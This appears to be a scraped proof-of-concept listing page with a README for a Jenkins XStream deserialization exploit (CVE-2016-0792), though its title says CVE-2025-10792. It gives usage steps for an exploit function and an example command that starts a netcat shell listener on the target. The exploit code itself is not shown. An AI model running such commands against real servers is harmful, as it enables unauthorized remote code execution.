POC详情： cae7f617f86d621803132d1ea2587df198a693ae

描述

test

介绍

# Jenkins CVE-2025-10792-test
## Exploit for Jenkins serialization vulnerability - CVE-2016-0792

#### Exploit database

[https://www.exploit-db.com/exploits/42394/](https://www.exploit-db.com/exploits/42394/)

#### More information can be found here

1. [Contrast Security](https://www.contrastsecurity.com/security-influencers/serialization-must-die-act-2-xstream)

2. [Pentester Lab](https://www.pentesterlab.com/exercises/cve-2016-0792/)

#### Requirements

1. Python 3.6.x

2. [requests](http://docs.python-requests.org/en/master/) library is required for this exploit to work

      `sudo pip install requests`

#### Usage

`python3`

`from exploit import exploit`

`exploit(url, command)`

Where url is url to jenkins server and command is command to execute

##### Example

`exploit('http://192.168.56.101/jenkins/', '/usr/bin/nc -l -p 9999 -e /bin/sh')`

This will run nc and listen on port 9999 on vulnerable machine

For demonstration purposes I will be running ISO from [Pentester Lab](https://www.pentesterlab.com/exercises/cve-2016-0792/)

[![asciicast](https://asciinema.org/a/131436.png)](https://asciinema.org/a/131436)

#### Disclaimer
Using this software to attack targets without permission is illegal. I am not responsible for any damage caused by using
 this software against the law.

文件快照

 [4.0K]  /data/pocs/cae7f617f86d621803132d1ea2587df198a693ae
└── [1.3K]  README.md

0 directories, 1 file

备注